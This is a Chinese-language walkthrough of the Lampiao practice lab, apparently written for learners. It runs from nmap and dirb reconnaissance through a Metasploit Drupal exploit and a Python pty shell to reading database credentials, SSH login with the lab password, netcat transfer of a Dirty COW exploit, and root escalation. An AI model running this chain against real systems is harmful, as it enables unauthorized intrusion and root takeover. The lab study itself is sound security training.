Lampiao 脏牛提权(CVE-2016-5195)

​

介绍

漏洞编号 CVE-2016-5195

漏洞名称：脏牛提权

漏洞危害：低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权，获取root权限

影响范围：Linux内核>=2.6.22(2007年发行)开始就受了影响了，直到2016年10月18日才修复

链接: 靶场下载地址，提取码
链接: 提权文件下载地址，提权码zp3j

信息收集

ifconfig 查看本地ip地址
nmap -sP 192.168.152.0/24 扫描网段，查看靶场地址

nmap -A 192.168.152.129 -p 0-65535扫描端口

打开网络地址http://[ip]:1898，出现此页面表示靶场打开成功

dirb 网站地址 扫描目录
我们使用robots.txt查看是否有可利用漏洞，查看

网站里面是drupal的版本信息，我们使用msfconsole查看是否有可利用漏洞

漏洞复现

Msfconsole #搜索是否有可利用漏洞
search drupal #查询漏洞
use 1 #查看序号为1的漏洞

show options #查看需要设置的内容#使用 set 进行设置
set RHOSTS 靶场地址
set RPSOST 靶场端口
run #进行运行,发现漏洞
shell #进行交互
python -c 'import pty; pty.spawn("/bin/bash")' #利用Python进行交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'
cat settings.php #查看里面内容

得到数据库的账号和密码

cd /home #进入/home 目录，查看已存在的账户

ssh连接 账号tiago 密码Virgulino 端口 22 连接成功
id查看当前用户信息
uname -a 查看靶机的内核版本

脏牛提权

脚本链接: 提权文件下载地址，提权码zp3j
kali tar -czvf aa.tar.gz CVE-2016-5195-master #对文件进行压缩
压缩后的名称为aa.tar.gz，需要传入靶机中，进行提权
靶机：监听4444端口上的 aa.tar.gz文件
nc -l 4444 > aa.tar.gz
kali 把aa.tar.gz文件传输过去
nc 192.168.152.129 4444 < aa.tar.gz
靶机 对传输过来的aa.tar.gz进行解压tar -xzvf aa.tar.gz#
进入 CVE-2016-5195-master
cd CVE-2016-5195-master
make #出现新内容 dcow
./dcow
root密码为dirtyCowFun
su 输入密码后提权成功

​